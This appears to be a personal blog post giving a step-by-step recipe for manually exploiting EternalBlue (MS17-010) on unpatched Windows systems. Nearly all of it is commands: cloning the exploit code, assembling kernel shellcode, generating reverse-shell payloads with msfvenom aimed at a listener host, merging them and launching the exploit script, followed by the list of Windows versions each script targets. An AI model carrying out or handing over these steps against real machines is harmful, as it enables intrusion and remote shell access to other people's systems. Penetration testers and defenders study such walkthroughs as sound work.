---
layout: post
title: Hacking EternalBlue By Hand
---
I know EternalBlue aka MS17-010 is nothing new.  However, I found a chance to use this exploit again and wanted to share (and remember the notes).  Credit goes to the folks at [puckiestyle.nl](http://www.puckiestyle.nl) who I shamelessly stole most of this writeup from.

### Get the code

`$ git clone https://github.com/worawit/MS17-010.git`

The first step is to assemble shellcode to binary. You can do either one (depending which architecture your target is running), or assemble both and merge them to a single binary file. The latter is useful when you don’t know the target arch or if you are planning to run it against multiple systems with different architectures.

```
$ ls -l MS17-010/shellcode/
total 44
-rw-r--r-- 1 root root 20305 Dec  2 22:03 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Dec  2 22:03 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Dec  2 22:03 eternalblue_sc_merge.py
```

### Prepare x64 shellcode

* Assemble kernel shellcode with nasm

`$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin`

* Generate a binary payload or use an existing one. Name this sc_x64_payload.bin

```
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin
```

* Concatenate payload & shellcode

`$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin`

### Prepare x86 shellcode

* Assemble kernel shellcode with nasm

`$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin`

* Generate a binary payload or use an existing one. Name this sc_x86_payload.bin

```
$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.0.29 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin
```

* Concatenate payload & shellcode

`$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin`

### Merging binaries

This step is only necessary when you want both x64 and x86 in the same binary. Assuming that you followed the steps above for each architecture; merging is done with the included eternalblue_sc_merge.py script:

`$ python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin`

### Running exploit

Stand up your local listener and run against vulnerable Windows 7 host

```
$ python MS17-010/eternalblue_exploit7.py 192.168.0.31 sc_all.bin
```

### Notes

Running these blindly against the target is a bad idea. Be sure to enumerate the OS first. Also, expect your target to crash or force a reboot once the session is closed.

The eternalblue scripts are located in MS17-010/ and have the following targets.

eternalblue_exploit7.py:

- Windows Server 2008 & R2
- Windows Server 2012 & R2 (x86)
- Windows Server 2016 (x64)
- Windows Vista
- Windows 7

eternalblue_exploit8.py:

- Windows Server 2012 (x64)
- Windows 8.1 & RT
- Windows 10 (x64) (build < 14393)
